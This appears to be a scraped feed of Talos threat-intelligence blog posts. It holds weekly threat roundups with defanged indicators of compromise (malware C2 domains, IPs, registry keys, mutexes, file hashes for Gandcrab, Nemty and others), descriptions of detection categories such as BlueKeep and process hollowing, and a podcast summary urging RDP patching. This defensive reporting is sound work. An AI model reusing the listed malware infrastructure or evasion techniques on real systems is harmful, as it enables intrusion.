\n`www[.]rpy91utwrm[.]com` | 1 \n`www[.]qeqvtkjksw[.]com` | 1 \n`www[.]0ac8n2n5zb[.]com` | 1 \n`www[.]eagzu4rlpm[.]com` | 1 \n`www[.]0rfabtbv2r[.]com` | 1 \n`www[.]abzze96jtg[.]com` | 1 \n`www[.]wfajyuswse[.]com` | 1 \n`www[.]d4ktsdbuhr[.]com` | 1 \n`www[.]ep2iu65g3l[.]com` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102 0a3079b8c4963b26e74760337da6cb0b1a6c532cc524f4d0aae6dab1d52f7d75 0a4e162d4a11aa91ead63995af22c410b422b8b5af2038d4ef95d454c1d380e1 0f4f25d12a2729552a348fb33cd7374fbd5ce3bc53c8da873f3aa5026a7290ca 33991dbeb097cb0937ae9ea049418089b3437e7f4ef23cbcf26b906b1ab39d5b 79d11b3634c5a3dc51442b4e8cdf88d921f9d46273a55ac20cd1fa7d0d51c11d 919119268cb2b13ae638c6015822352d899cc39ea10959a86634c8bd2fc8912b 940eaff21163abfe8be6301e561e30a27f23800cb8bfe4a5df9a5ff7dbfb1d4f a31fdd57bc317cd8f6c4df0c6f75bcd25999d36f7cc665da9018672dfe55061c b5d15bb5d2a6bde41040d4b9d63e8cc1cfddf8669f5c1389c2aba584328dc27b e45c5802e6091e4602519853d81ad08f45969d574cfa3d1e36a6af8bd0daaaf7 f3475d70597f4f77ab542f79c295c120094f9dc35bddb706bfb80b1e8787a061 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-SZ-VrEa38rw/XiIySm0SjyI/AAAAAAAADJ0/zfyXN9AUVHccvfIbFMN6ASwxZtphlhoUgCLcBGAsYHQ/s1600/05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-GpMbeK_HK8I/XiIyX4bvVCI/AAAAAAAADJ8/ru4-fDcdqLs8-8ZKOzBAqX2YM9hV9woBQCLcBGAsYHQ/s1600/05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (22771) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (394) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nExcessively long PowerShell command detected \\- (304) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (181) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nDealply adware detected \\- (147) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nGamarue malware detected \\- (141) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (125) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nCorebot malware detected \\- (22) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \nFusion adware detected \\- (13) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \nIcedID malware detected \\- (10) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n \n", "cvss3": {}, "published": "2020-01-17T14:55:21", "type": "talosblog", "title": "Threat Roundup for January 10 to January 17", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2020-01-17T14:55:21", "id": "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/U32MSyxPJMs/threat-roundup-0110-0117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T20:20:22", "description": "[](<https://1.bp.blogspot.com/-5SjstCoUMTQ/XO7VLvIo2nI/AAAAAAAAAUg/OgofNweHYSIqJZCVL27F5fwRtWgcnXLUACLcBGAs/s1600/BWT_EP54_JoelBubble.jpg>)\n\n \n\n\nBeers with Talos (BWT) Podcast Ep. #54 is now available. Download this episode and subscribe to Beers with Talos:\n\n[](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>)[](<https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca>)[](<https://www.stitcher.com/podcast/talos/beers-with-talos>) \n\n\nIf iTunes and Google Play aren't your thing, click [here](<http://www.talosintelligence.com/podcast>).\n\n \nRecorded May 24, 2019 \u2014 There is another Blue(X) to talk about and guess what? YES, YOU STILL NEED TO PATCH. We talk about RDP, the source of this vulnerability and whether or not exploits exist for it (hint: they do). There is a quick look back at last year on the anniversary of VPNFilter, and we also tackle zero-days again through the lens of Project Zero\u2019s timeline of zero-days found in the wild. \n \nAlso, Craig hasn\u2019t seen the end of \"John Wick 3\" yet, so feel free to tweet him spoilers. If you are in San Diego for Cisco Live two weeks from now, come find us to see a live recording of the podcast! \n \n\n\n### The timeline:\n\n * 01:00 \u2014 Roundtable: The Dark Times, it\u2019s not what you THOT, and deducing a new baby\u2019s name\n * 13:00 \u2014 Happy birthday VPNFilter, I didn\u2019t get you anything and I\u2019m not sorry.\n * 18:00 \u2014 RDP and BlueKeep: Really Do Patch. Stop, go do it. Blah blah blah, not listening. Go patch.\n * 29:00 \u2014 Zero-days: The amount of time a patch has been available any exploit, and/or since machines have made an attempt on Craig\u2019s life.\n * 38:30 \u2014 Project Zero Timeline of zero-day found in the wild \n * 47:30 \u2014 Parting shots, closing thoughts\n\n### Some other links:\n\n * [MS Guidance for CVE 2019-0708](<https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708>)\n * [Project Zero sheet](<https://docs.google.com/spreadsheets/u/1/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/htmlview#>)\n========== \n\n\n \nFeaturing: [Craig Williams](<https://twitter.com/security_craig>) (@Security_Craig), [Joel Esler](<https://twitter.com/JoelEsler>) (@JoelEsler), [Matt Olney](<https://twitter.com/kpyke>) (@kpyke) and [Nigel Houghton](<https://twitter.com/EnglishLFC>) (@EnglishLFC). \n \nHosted by [Mitch Neff](<https://twitter.com/MitchNeff>) (@MitchNeff). \n \n\n\n[Subscribe via iTunes](<http://cs.co/talositunes>) (and leave a review!)\n\n \n\n\nCheck out the [Talos Threat Research Blog](<http://cs.co/talosresearch>)\n\n \n\n\nSubscribe to the [Threat Source newsletter](<http://cs.co/talosupdate>)\n\n \n\n\nFollow [Talos on Twitter](<http://cs.co/talostwitter>)\n\n \n\n\nGive us your feedback and suggestions for topics: [beerswithtalos@cisco.com](<mailto:beerswithtalos@cisco.com>) \n\n\n[ \n](<mailto:beerswithtalos@cisco.com>)\n\n", "cvss3": {}, "published": "2019-05-29T12:19:17", "type": "talosblog", "title": "Beers with Talos Ep. #54: Patch after listening, RDP and wild 0-days", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-05-29T12:19:17", "id": "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/TuVwJYeiLF8/beers-with-talos-ep-54-patch-after.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-21T19:32:51", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 14 and Feb. 21. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>). \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Gandcrab-7586670-0 | Dropper | Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension \".GDCB,\" \".CRAB\" or \".KRAB\". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. \nWin.Packed.Mikey-7586709-0 | Packed | Mikey is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. This threat can also receive additional commands and perform other malicious actions on the system, such as installing additional malware upon request. \nWin.Malware.Qakbot-7586710-1 | Malware | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Malware.Razy-7588195-0 | Malware | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, then sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Packed.Generickdz-7586813-0 | Packed | This is a BobSoft Delphi application that wraps malware. In the current campaign, the HawkEye spyware is installed. The malware uses process hollowing to hide from detection and achieves persistence across reboots by leveraging an Autostart key in the Windows registry. \nWin.Packed.Tofsee-7586819-1 | Packed | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nWin.Malware.Nymaim-7586870-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain-generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Ransomware.Remcos-7586925-1 | Ransomware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Autoit-7586956-0 | Malware | This signature covers malware leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows adversaries to write fully functional malicious software. This family will install itself on the system and contact a C2 server to receive additional instructions or download follow-on payloads. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Gandcrab-7586670-0\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 48 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eegsjfdkqvr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: ythjobixtnr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: yeelxnznvki ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: umwdlwwsaaz ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: piveskqvesb ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: ispyjcnalox ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\OFAGAS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Diokydyb ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SYSTEM \nValue Name: Panda ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\OFAGAS \nValue Name: Ydcyuxos ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: pkmkandzsro ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: ejmsgaummxr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: hujteforzto ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: jcrillrkibx ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: hrsalhxnejd ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: dctzafzqnkl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: cuzlcuudbwx ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: sxzpjghkvsd ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: wriuvpwacau ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: duivayvsjqx ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: xbxpanidwht ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: uethoblisdu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: sarblkidckc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: sujhhdohjjr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: yfvdvhnadpu ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c` | 46 \n`GLOBAL\\{<random GUID>}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`66[.]171[.]248[.]178` | 46 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipv4bot[.]whatismyipaddress[.]com` | 46 \n`1[.]1[.]168[.]192[.]in-addr[.]arpa` | 46 \n`dns1[.]soprodns[.]ru` | 46 \n`nomoreransom[.]bit` | 46 \n`gandcrab[.]bit` | 46 \n`nomoreransom[.]coin` | 46 \n`bon[.]aungercote[.]org` | 1 \n`ver[.]sceinsheru[.]org` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 46 \n`%APPDATA%\\Microsoft\\<random, matching '[a-z]{6}'>.exe` | 46 \n`%APPDATA%\\Enylf\\vyku.exe` | 1 \n`%APPDATA%\\Guibc` | 1 \n`%APPDATA%\\Guibc\\hyka.irp` | 1 \n`%APPDATA%\\Gyun` | 1 \n`%APPDATA%\\Gyun\\vaxac.qae` | 1 \n`%APPDATA%\\Nozuo` | 1 \n`%APPDATA%\\Nozuo\\quzui.exe` | 1 \n \n#### File Hashes\n\n` 099c47434a97a9bcd0c6bb5f0291bb69d70dd05ab002fa83487d63b997b90f96 09eeafacfe79c4fc87c45dab72ce88aa1e234e668e2535e209beaa4a8181610f 0d293a8759d4bae6aa5d8587108a508f6d40efb449dbc239800efebb7a2bf2d7 10ae8e44b98f0255ba8e6d819d804e8379336500f3e27a14bb5b8ea72a07eb80 134e8947ef2f684d816c6c1da588fba3f9f0c08c24533adc02cbcb93d9e1494a 145bcff3aca6ba04f241e0d5ced04e2781c8a0f225ebf51dcddfb238fdbc63ea 18213dfc3c25be525312f6ff70e4ea8861233bc562d1442a501a0ae7c7bd93f4 187591cccfe3eb0c7bea183e03a735be581f704866b2bf2f82c2f57c759f5fde 1a2e00ce828da6130592178bd3b0bf47f2b3edefafffe7e6371622aae1ceb9af 1a99329960098a5414c2fac1bad96ef143878fb5435bcdc6cef9d288081e8b4b 1d2d031f33ce5adea4a45c700e29e99903d55850481fb17deb479fe47d367a18 1e4294a2b465e27903582116b12d5db2a6999116e27c698b5b98ae52035649b7 1ee6e03bfe259cf4a95c093e85056ae9807fa53f83f465b8878d74a114f148fd 2164d2a4c1a861298c8003118855be9ae68614c5e557638830038658b2e6e47c 22d18aa907e4750c7fce359140c44db444c644e8576c8609ca54c2e85afa0ac7 234bcafc5700b9f59d30bbcd0b7ba4694e49ffe6621ed63a5a6f0464a6aba447 25a297586142486627a765200bfc30658cdb4500949c581a83d1be262c60c4c6 25ae0f8e3b3938131d098ff7832167a5b6629e6cb8972827b7f1175b69e063c9 2651e9bbd4004b56eefa43f4f7ffd982d16d07df2980423cb54b1ee585172ae5 274d2074201aabff30008390fbc34087fc9aead9ec924d18708a0d6670bb6995 276f56271a9b3e3fcce07ccd2e4dab2a4316b90e8e715e2657b572da0109c801 2a7ad044e7f131e71e794cc8dd31ce746f455d9c53e45b88c3696891f4f11b35 2bb8a6eae8695c55070f5f78371609052f73826a2df29a9e2ab82c7c89603369 2cecccc835e1485e21cc45c86571f82f06223e422f59410228c140e77862ef3a 2d239ffa8b5e13e8c19de06e5d5825e24df4c52f31741ab7373b2b74b612ab2f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4FVaIANFD4I/XlARnD1EhfI/AAAAAAAADUU/-lAGQkXWhkAxzdivKR5_M1-45dpGp1_eACLcBGAsYHQ/s1600/ae3798e9a455f50c9911c3a1ee08f59ef5da4e74833678e7ddbea1ebbedb465c_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-HneYB_RfzF4/XlARrvh7zqI/AAAAAAAADUY/CXOa9fTdCRYHT5nqmfqP8mMVVCMsfF-nACLcBGAsYHQ/s1600/ae3798e9a455f50c9911c3a1ee08f59ef5da4e74833678e7ddbea1ebbedb465c_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-snANC_HV5ro/XlARvxUSXwI/AAAAAAAADUc/HqVmeLBjI9gWDZbUQDhX3VoLEvzhSaRGQCLcBGAsYHQ/s1600/ae3798e9a455f50c9911c3a1ee08f59ef5da4e74833678e7ddbea1ebbedb465c_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Mikey-7586709-0\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 16 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DEFAULTICON ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 4 \n`<HKCU>\\SOFTWARE\\NEMTY ` | 4 \n`<HKCU>\\SOFTWARE\\NEMTY \nValue Name: fid ` | 4 \n`<HKCU>\\SOFTWARE\\NEMTY \nValue Name: pbkey ` | 4 \n`<HKCU>\\SOFTWARE\\NEMTY \nValue Name: cfg ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: Description ` | 1 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 1 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ ` | 1 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 1 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 1 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UNBHGOUJ \nValue Name: ImagePath ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\<random guid>` | 7 \n`Vremya tik-tak... Odinochestvo moi simvol...` | 4 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 3 \n`A238FB802-231ABE6B-F2351354-CF072D6D-090D08F1` | 1 \n`chv8VoF8462A240TQszdiFeaRyFs610A` | 1 \n`A238FB802-231ABE6B-F2351354-7FCA0C5B-B9CFE7DF` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]164[.]179` | 3 \n`172[.]217[.]7[.]243` | 2 \n`104[.]26[.]4[.]15` | 2 \n`46[.]29[.]160[.]26` | 2 \n`104[.]26[.]5[.]15` | 2 \n`194[.]116[.]162[.]29` | 2 \n`91[.]215[.]170[.]234` | 2 \n`46[.]4[.]52[.]109` | 1 \n`104[.]47[.]36[.]33` | 1 \n`43[.]231[.]4[.]7` | 1 \n`93[.]171[.]200[.]64` | 1 \n`67[.]195[.]228[.]110/31` | 1 \n`168[.]95[.]5[.]112/31` | 1 \n`168[.]95[.]5[.]216/30` | 1 \n`168[.]95[.]5[.]118/31` | 1 \n`172[.]217[.]197[.]26/31` | 1 \n`98[.]136[.]96[.]76/31` | 1 \n`203[.]15[.]169[.]11` | 1 \n`67[.]195[.]204[.]73` | 1 \n`85[.]114[.]134[.]88` | 1 \n`67[.]195[.]204[.]75` | 1 \n`67[.]195[.]204[.]80` | 1 \n`98[.]136[.]96[.]92/31` | 1 \n`134[.]0[.]12[.]89` | 1 \n`198[.]35[.]20[.]31` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]myexternalip[.]com` | 4 \n`nemty10[.]hk` | 4 \n`api[.]db-ip[.]com` | 4 \n`0300ssm0300[.]xyz` | 3 \n`ghs[.]googlehosted[.]com` | 2 \n`smtp[.]secureserver[.]net` | 1 \n`ipinfo[.]io` | 1 \n`api[.]pr-cy[.]ru` | 1 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 1 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 1 \n`centrum[.]sk` | 1 \n`post[.]sk` | 1 \n`msx-smtp-mx1[.]hinet[.]net` | 1 \n`www[.]google[.]no` | 1 \n`damstein[.]no` | 1 \n`clayvard[.]com` | 1 \n`oppdal-booking[.]no` | 1 \n`luthgruppen[.]no` | 1 \n`gjestal[.]no` | 1 \n`claytonwright[.]co[.]uk` | 1 \n`hxqk[.]sk` | 1 \n`lovetts[.]com` | 1 \n`upkm[.]sanet[.]sk` | 1 \n`loveumail[.]com` | 1 \n`vae[.]sk` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\CC4F.tmp` | 7 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 6 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 6 \n`%HOMEPATH%` | 5 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\01\\0119C23D88292A0E4FEC04D5CF8629005A44E37C` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\17\\17542707A3D9FA13C569450FD978272EF7070A77` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\1A\\1A141DBFA4083406630DD9A81AD35C416F604800` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\47\\47267F943F060E36604D56C8895A6EECE063D9A1` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\95\\954D59EAEADC36CB19A224A5DDDFA1EDCFDC49CE` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\A2\\A2C4E53F8E58DC61E337D4CFBBDFBF5BA2825852` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\A5\\A5B16A7D28D2BA79A9CCFC16ED480AD75A757166` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\AF\\AF210C8748D77C2FF93966299D4CD49A8C722EF6` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\B0\\B066A9B35AE0BB605431AC8740DEA2A659EED4C4` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\D3\\D34ED774F9FDCBA938A7807BD8FB1B398C51BC81` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Quick\\{69EB062C-C99C-4979-B7E6-36430B258597}` | 4 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\518e2bc94bc324e5e6f82437175ae1af_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 4 \n`%ProgramData%\\Microsoft\\User Account Pictures\\Administrator.dat` | 4 \n`%ProgramData%\\Microsoft\\Windows Defender\\Scans\\CleanStore\\LastBld.dat` | 4 \n`%APPDATA%\\NEMTY_GBF756G-DECRYPT.txt` | 1 \n`%HOMEPATH%\\Desktop\\NEMTY_GBF756G-DECRYPT.txt` | 1 \n`%HOMEPATH%\\Documents\\NEMTY_GBF756G-DECRYPT.txt` | 1 \n`%HOMEPATH%\\Downloads\\NEMTY_GBF756G-DECRYPT.txt` | 1 